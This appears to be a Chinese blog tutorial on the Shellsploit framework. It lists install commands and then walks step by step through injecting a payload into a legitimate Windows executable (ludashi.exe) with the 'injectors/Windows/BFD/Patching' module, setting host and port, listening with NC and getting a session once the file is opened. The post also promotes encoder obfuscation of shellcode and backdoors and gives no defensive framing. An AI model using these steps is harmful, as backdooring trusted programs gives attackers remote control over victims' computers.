Shellsploit注入器简单利用

 

 

 

 

Shellsploit让您为各种操作系统生成自定义的shellcode,后门,注入器。让我们通过编码器对每个字节进行混淆。

github:  https://github.com/vasco2016/shellsploit-framework

依赖安装
root$ sudo pip install capstone
root$ sudo pip install readline(Not necessary for windows coz preinstalled in shellsploit)
root$ sudo pip install pefile
root$ sudo pip install colorama
root$ sudo pip install pylzma

安装
Pip在windows/nix机器上都没有问题安装命令如下:
root$ python setup.py –s/ –-setup install
root$ chmod +x shellsploit (if you are using windows just pass this step)
root$ ./shellsploit

 

1.使用shellsploit可以看到运行界面,其实使用方法和msf类似,差不多!

2.比如我在这里查看injectors注入模块

  1. ssf> show injectors

3.使用injectors模块其中一个

  1. ssf>use injectors/Windows/BFD/Patching

4.查看下他里面有什么选项(其实和msf设置方法差不多)

  1. ssf:injectors/Windows/BFD/Patching > show options

5.剩下的设置file 、host、port 这些选择,进行一些设置,其中的file选择我已经将模板放到了目录当中。

6.进行Payload注入,注入后的模板放入到了—File /root/shellsploit-framework/704125575/ludashi.exe

  1. ssf:injectors/Windows/BFD/Patching > inject

7.使用NC进行监听

8.打开payload得到会话

这里可能有些小小的BUG,但影响并不大我们依然可以得到会话。

 

 
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值